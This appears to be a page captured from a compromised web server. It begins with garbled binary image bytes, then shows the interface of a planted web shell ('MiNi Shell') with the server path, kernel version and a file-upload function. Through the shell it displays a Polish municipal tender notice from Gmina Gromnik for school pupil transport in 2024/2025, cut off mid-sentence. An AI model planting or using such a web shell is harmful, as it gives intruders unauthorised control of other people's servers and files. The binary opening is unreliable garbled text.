JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240722/0042421201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług transportowych w zakresie przewozów szkolnych uczniów na terenie Gminy Gromnik w roku szkolnym 2024/2025 oraz sprawowanie opieki nad uczniami podczas przewozu. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GROMNIK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851660950</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Witosa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gromnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-180</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@gromnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gromnik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług transportowych w zakresie przewozów szkolnych uczniów na terenie Gminy Gromnik w roku szkolnym 2024/2025 oraz sprawowanie opieki nad uczniami podczas przewozu. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9e10b2c0-e56a-4c72-8255-3ede2788968f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00424212</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00032163/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług transportowych w zakresie przewozów szkolnych uczniów na terenie Gminy Gromnik oraz sprawowanie opieki nad uczniami podczas przewozu Okres realizacji: IX.2024 r. – VI.2025 r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9e10b2c0-e56a-4c72-8255-3ede2788968f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a<br/>wykonawcami odbywa się przy użyciu platformy e-zamówienia, dostępnej pod adresem https://ezamowienia.gov.pl/ lub poczty<br/>elektronicznej: ug@gromnik.pl lub przetargi@gromnik.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi zarejestrować się na Platformie e-zamówienia. Platforma jest<br/>dostępna dla każdego zalogowanego użytkownika. Rodzaj dostępnych formularzy zależy od posiadanego na Platformie konta.<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na platformie e-zamówienia oraz zalogowania się na platformie e-zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na platformie e-zamówienia. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości<br/>widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>3. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług platformy e-zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa regulamin platformy e-zamówienia. W przypadku problemów technicznych i<br/>awarii związanych z funkcjonowaniem platformy e- zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego<br/>pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>5. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania zarejestrowaną na platformie e-Zamówienia.<br/>6. Zamawiający przekazuje link do postępowania oraz ID postępowania. Dane postępowanie można wyszukać również na liście<br/>wszystkich postępowań na platformie e-zamówienia, klikając kafelek „Przeglądaj postępowania / konkursy”.<br/>7. We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i wykonawcy posługują się numerem<br/>referencyjnym sprawy, tj. IK.271.8.2024.ZP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegóły w Dziale XX SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegóły w Dziale XX SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IK.271.8.2024.ZP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest usługa polegająca na przewozie szkolnym uczniów (dowóz i odwóz) z terenu Gminy<br/>Gromnik w roku szkolnym 2024/2025 (10 miesięcy) oraz sprawowanie opieki nad uczniami podczas przewozu.<br/>2. W ramach przewozu szkolnego Wykonawca zapewnia dowóz uczniów do ZS w Gromniku oraz Zespołu Szkolno-<br/>Przedszkolnego w Siemiechowie i odwóz uczniów z powyższych placówek oświatowych do przystanków zlokalizowanych na<br/>następujących trasach dowozu:<br/>— do Zespołu Szkół w Gromniku<br/>Przywozy<br/>TRASA<br/>PRZYBLIŻONA ODLEGŁOŚĆ<br/>PRZYBLIŻONA ILOŚĆ PRZYSTANKÓW<br/>SZACUNKOWA LICZBA DZIECI<br/>SZKOŁA<br/>1. Polichty – Gromnik Góry – Gromnik 7 km 4 16<br/>ZS Gromnik<br/>2. Golanka - Gromnik 3 km 2 16<br/>ZS Gromnik<br/>Odwozy<br/>TRASA<br/>PRZYBLIŻONA ODLEGŁOŚĆ<br/>PRZYBLIŻONA ILOŚĆ PRZYSTANKÓW<br/>SZACUNKOWA LICZBA DZIECI<br/>SZKOŁA<br/>1. Gromnik – Gromnik Góry – Polichty 7 km 4 16<br/>ZS Gromnik<br/>2. Golanka - Gromnik 3 km 2 16<br/>ZS Gromnik<br/>— do Zespołu Szkolno-Przedszkolnego w Siemiechowie<br/>Przywozy<br/>TRASA<br/>PRZYBLIŻONA ODLEGŁOŚĆ<br/>PRZYBLIŻONA ILOŚĆ PRZYSTANKÓW<br/>SZACUNKOWA LICZBA DZIECI<br/>SZKOŁA<br/>1. Siemiechów (Igle, Dybkówka, Folwark, Remiza OSP, Ośrodek Zdrowia, droga na Wróblowice, Siemiechów Góry,<br/>Siemiechów Góry(za wyciągiem)) 19 km 11 37 ZSP<br/>Siemiechów<br/>Odwozy<br/>TRASA<br/>PRZYBLIŻONA ODLEGŁOŚĆ<br/>PRZYBLIŻONA ILOŚĆ PRZYSTANKÓW<br/>SZACUNKOWA LICZBA DZIECI<br/>SZKOŁA<br/>1. Siemiechów (Igle, Dybkówka, Folwark, Remiza OSP, Ośrodek Zdrowia, droga na Wróblowice, Siemiechów Góry,<br/>Siemiechów Góry (za wyciągiem)) 19 km 11 37 ZSP Siemiechów<br/>Łączna szacunkowa liczba uczniów: 69<br/>Łączna dzienna długość tras przewozów szkolnych ok: 58 km.<br/>Uwaga!<br/>W powyższym kilometrażu jest uwzględniony tylko dowóz i odwóz, a nie uwzględniono dojazdu Wykonawcy do przystanków<br/>początkowych oraz odjazdu z przystanków końcowych tras, które zapewnia we własnym zakresie Wykonawca.<br/>Dane zawarte w powyższych tabelach są szacunkowe, Zamawiający w trakcie trwania umowy zastrzega sobie prawo do<br/>zmiany dziennej ilości kilometrów oraz zmiany liczby przewożonych uczniów bez ponoszenia dodatkowych kosztów z tego<br/>tytułu.<br/>Wykonawca we własnym zakresie uzgodni z odpowiednim zarządcą zasady korzystania z w/w przystanków.<br/>3. Przewozy uczniów dotyczą dni w których odbywają się zajęcia lekcyjne, wyłączając dni wolne od nauki, przerwy<br/>świąteczne, czas trwania ferii zimowych obowiązujących w województwie małopolskim. W przypadku odpracowywania zajęć<br/>szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz dzieci zgodnie z rozkładem<br/>jazdy ustalonym przez Dyrektorów poszczególnych Szkół.<br/>4. Przewóz uczniów odbywać się będzie według harmonogramów ustalonych pomiędzy Wykonawcą a Dyrektorami<br/>poszczególnych Szkół i będą mogły ulegać zmianie w związku z organizacją pracy Szkół z siedmiodniowym<br/>wyprzedzeniem.<br/>5. Powyższe harmonogramy zawierać będą szczegółowe ustalenia dotyczące liczby uczniów, tras, przedziałów czasowych i<br/>przystanków w jakich powinien być wykonany dowóz uczniów do szkoły oraz ich odwóz po zakończeniu zajęć lekcyjnych.<br/>6. Realizując zamówienie Wykonawca musi dysponować dwoma (2) pojazdami/autobusami - o liczbie miejsc wynikającej z<br/>zestawienia liczby przewożonych uczniów oraz trzecim rezerwowym pojazdem/autobusem, ażeby w sytuacji awaryjnej<br/>zapewnić przewóz uczniów.<br/>7. Pojazdy muszą posiadać wystarczającą liczbę miejsc na określonej trasie – uczniowie muszą mieć zagwarantowane<br/>miejsca siedzące.<br/>8. Pojazdy służące do przewozu uczniów muszą spełniać wymagania techniczne określone w przepisach ustawy z dnia 20<br/>czerwca 1997r. Prawo o ruchu drogowym (tj., Dz. U. z 2023 r. poz. 1047) oraz innych przepisach związanych z przewozem<br/>osób. Winny być w pełni sprawne, spełniać wymogi bezpieczeństwa, odpowiednio oznakowane (zgodnie z obowiązującymi<br/>przepisami), utrzymane w czystości z zachowaniem estetyki wewnętrznej i zewnętrznej. Zamawiający zastrzega sobie<br/>możliwość kontroli pojazdów.<br/>9. W przypadku awarii pojazdu przewożącego uczniów, Wykonawca zobowiązany jest na własny koszt zapewnić transport<br/>zastępczy (maksymalny dopuszczalny czas podstawienia pojazdu zastępczego wynosi 60 minut) spełniający wszelkie<br/>wymogi określone przez Zamawiającego przy udzieleniu zamówienia. O powyższym fakcie muszą być powiadomieni<br/>Dyrektorzy poszczególnych Szkół.<br/>10. W przypadku braku zabezpieczenia pojazdu zastępczego Zamawiający wynajmie pojazd we własnym zakresie a<br/>kosztami obciąży Wykonawcę (z należnego wynagrodzenia) oraz nałoży karę w wysokości określonej w umowie.<br/>11. Wykonawca nie może powierzyć wykonania usługi wynikającej z niniejszej umowy innej osobie bez pisemnej zgody<br/>Zamawiającego.<br/>12. W razie zaprzestania świadczenia usług lub nieprzystąpienia przez Wykonawcę do świadczenia usług przewozowych w<br/>umownym terminie Zamawiający będzie uprawniony do powierzenia wykonania usług przewozu uczniów innemu<br/>Wykonawcy. Wykonawca zobowiązuje się do zapłaty całości kosztów związanych z wykonaniem przewozów zastępczych.<br/>13. Opiekę nad uczniami oraz ich bezpieczeństwo w czasie przewozów organizuje i zapewnia Wykonawca. Opiekunem<br/>uczniów nie może być kierowca autobusu. Osoba pełniąca funkcję opiekuna będzie zobowiązana w szczególności do:<br/>zapewnienia bezpieczeństwa w trakcie przewozów, zapewnienia opieki i zwracanie uwagi na właściwe zachowanie się<br/>uczniów w czasie przejazdu.<br/>14. Wykonawca zobowiązany jest do przestrzegania wszystkich wymogów prawnych dotyczących przewozów dzieci<br/>szkolnych, zapewnienia im właściwej opieki oraz odpowiednich warunków bezpieczeństwa i higieny.<br/>15. Przewóz uczniów ma się odbywać ubezpieczonymi pojazdami/autobusami posiadającymi aktualny przegląd techniczny.<br/>Wykonawca ubezpiecza pojazdy/autobusy i pasażerów od wszelkich szkód powstałych podczas przewozu oraz<br/>pozostających w związku z przewozem.<br/>16. Wykonawca winien posiadać wiedzę w zakresie znajomości terenu Gminy oraz odległości pomiędzy poszczególnymi<br/>miejscowościami w Gminie Gromnik.<br/>Wymagania stawiane Wykonawcy:<br/>17. Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla<br/>przedmiotu zamówienia.<br/>18. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.<br/>19. Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez Zamawiającego z ustanowionym<br/>przedstawicielem Wykonawcy.<br/>20. Określenie przez Wykonawcę telefonów kontaktowych, adresu e-mail oraz innych ustaleń niezbędnych dla sprawnego i<br/>terminowego wykonania zamówienia.<br/>21. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu<br/>zamówienia.<br/>22. Wykonawca ponosi pełną odpowiedzialność za szkody i następstwa nieszczęśliwych wypadków wynikających z<br/>nieprawidłowej realizacji zamówienia.<br/>23. W trakcie wykonywania przewozu uczniów Wykonawca zobowiązuje się do przestrzegania następujących przepisów<br/>prawnych:<br/>1) Ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (Dz. U. z 2023 poz. 1047),<br/>2) Ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2024 poz. 728),<br/>oraz innych, obowiązujących przepisów prawnych dotyczących przedmiotu zamówienia,<br/>3) doraźnych zarządzeń, poleceń i uwag dotyczących organizacji przewozu uczniów, wydawanych przez Dyrektorów<br/>poszczególnych Szkół. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami o znaczeniu (wadze):<br/>• cena oferty brutto znaczenie – 60 pkt<br/>• czas podstawienia pojazdu zastępczego znaczenie – 40 pkt<br/>1) Punkty w kryterium cena oferty brutto „(KC)” zostaną wyliczone wg. poniższego wzoru:<br/>CN<br/>KC = ----- x 60 (pkt.)<br/>COB<br/>gdzie:<br/>KC - ilość punktów przyznanych Wykonawcy,<br/>CN - najniższa zaoferowana cena, spośród wszystkich ofert nie podlegających odrzuceniu,<br/>COB – cena zaoferowana w ofercie badanej,<br/>2) Punkty w kryterium czas podstawienia pojazdu zastępczego „(KPZ)” zostaną wyliczone wg. poniższego wzoru:<br/>KPZN<br/>KPZ = ----- x 40 (pkt.)<br/>KPZOB<br/>gdzie:<br/>KPZ – ilość punktów przyznanych Wykonawcy,<br/>KPZN – najkrótszy zaoferowany czas podstawienia pojazdu zastępczego,<br/>KPZB – zaoferowany czas podstawienia pojazdu zastępczego w ofercie badanej.<br/>Uwaga:<br/>• Maksymalny czas podstawienia pojazdu zastępczego od wezwania (telefonicznego), przez pracownika Urzędu Gminy – 60 minut<br/>• Minimalny czas podstawienia pojazdu zastępczego od wezwania (telefonicznego), pracownika Urzędu Gminy – ¬ 30 minut,<br/>• W przypadku niewypełnienia przez Wykonawcę w formularzu ofertowym (Załącznik nr 1) pola określającego czas podstawienia<br/>pojazdu zastępczego, będzie to równoznaczne z zaoferowaniem 60 minut,<br/>• W przypadku, gdy którykolwiek z Wykonawców zaoferuje czas podstawienia pojazdu zastępczego krótszy niż 30 minut,<br/>Zamawiający do obliczenia punktacji wszystkich Wykonawców w kryterium czas podstawienia pojazdu zastępczego przyjmuje 30<br/>minut.<br/>2. Za najkorzystniejszą zostanie uznana oferta, która nie podlega odrzuceniu oraz uzyska najwyższą łączną ocenę w wyżej<br/>wymienionych kryteriach oceny ofert. Liczba punktów będzie zaokrąglana do drugiego miejsca po przecinku. Liczbę punktów<br/>uzyskanych przez Wykonawcę oblicza się wg wzoru:<br/>P = Kc + KPZ<br/>P – liczba punktów uzyskanych przez Wykonawcę, gdzie:<br/>KC – liczba punktów uzyskanych za kryterium „Cena oferty brutto”,<br/>KPZ – liczba punktów uzyskanych za kryterium „Czas podstawienia pojazdu zastępczego”<br/>3. Maksymalna ilość punktów jaką, po uwzględnieniu znaczenia (wagi) kryterium, może osiągnąć oferta wynosi 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1. nie podlegają wykluczeniu;<br/>2. spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ogłoszeniu o zamówieniu i niniejszej SWZ.<br/>3. Zamawiający wymaga wykazania przez Wykonawcę spełnienia warunków określonych w art. 112 ust. 2 ustawy Pzp<br/>dotyczących:<br/>a) zdolności do występowania w obrocie gospodarczym – Zamawiający nie precyzuje warunku udziału w tym zakresie,<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów –<br/>Zamawiający uzna, że Wykonawca spełnia warunek wówczas gdy:<br/> Wykonawca będzie posiadać licencje w zakresie objętym zamówieniem publicznym, tj. licencja na krajowy przewóz osób, o<br/>której mowa w art. 5 ust. 1 ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. 2024 r. poz. 728).,<br/>c) sytuacji ekonomicznej lub finansowej – Zamawiający nie precyzuje warunku udziału w tym zakresie,<br/>d) zdolności technicznej lub zawodowej – w celu wykazania spełnienia warunku, Wykonawca wykaże się:<br/>• doświadczeniem w należytym wykonaniu (lub w wykonywaniu – w przypadku świadczeń okresowych lub ciągłych) w<br/>okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, co najmniej jedną usługę polegającą na przewozie szkolnym uczniów przez minimum jeden rok szkolny,<br/>• dysponuje lub będzie dysponował trzema (3) pojazdami/autobusami (dwoma o liczbie miejsc wynikającej z zestawienia<br/>liczby przewożonych uczniów oraz trzecim rezerwowym pojazdem/autobusem, ażeby w sytuacji awaryjnej zapewnić<br/>przewóz uczniów) spełniającymi wymagania zawarte w niniejszej SWZ.<br/>4. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu polegać na zdolnościach<br/>technicznych lub zawodowych podmiotów udostępniających zasoby na zasadach określonych 